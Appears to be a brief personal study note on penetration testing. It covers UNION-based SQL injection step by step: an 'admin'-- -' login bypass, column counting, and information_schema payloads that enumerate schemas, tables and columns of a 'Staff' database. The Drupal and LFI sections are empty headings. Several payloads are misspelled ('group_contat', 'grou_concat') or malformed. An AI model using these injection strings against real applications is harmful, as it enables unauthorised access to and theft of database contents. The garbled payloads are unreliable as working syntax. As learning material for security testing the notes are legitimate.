SQL & LFI

if you find a SQL vuln in an application, try UNION injection
if the basic "admin'-- -" is possible, that means the query will look like
SELECT * FROM USERS WHERE FIRST_NAME = 'userinput'-- -'
so everything after WHERE is possible 
MySQL ::   MySQL 5.1 Reference Manual :: 12.2.8.3 UNION Syntax
In this example below, we've got ID, Name, Position, Phone No, and Email data
Try doing admin' UNION SELECT NULL,NULL,....  -- - to see any weird behaviors. (data breaking, byte changes) with burp 
or do admin' ORDER BY 1, ORDER BY 2.....
If it breaks that means it can only handle the number before the error. 
​
Now, we can extract useful data from the database! 
https://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
pentestmonkey.net
try database() 
Information_schema.tables 
extract data from columns, tables 
​
1.UNION SELECT SCHEMANAME,2,3,4,5,6 FROM information_schema.schemata -- - 
if you can't extract multiple data at once, try
'UNION SELECT groupconcat(SCHEMANAME),2,3,4,5,6, FROM information_schema.schemata-- - 
​
What tables are in user database? 
group_contat(TABLE_NAME) FROM information_schema.tables where table_schema = "Staff"-- -
Once we know table names, try to extract data from columns
grou_concat(COLUMN_NAME),2,3,4,5,6, FROM information_schema.columns where table_schema = "Staff"-- -
displaying table and columns names 
grou_concat(TABLE_NAME,":",COLUMN_NAME),2,3,4,5,6, FROM information_schema.columns where table_schema = "Staff" and table_name ="Users"-- -
​
​
Drupal (CMS)
LFI
Last modified 1yr ago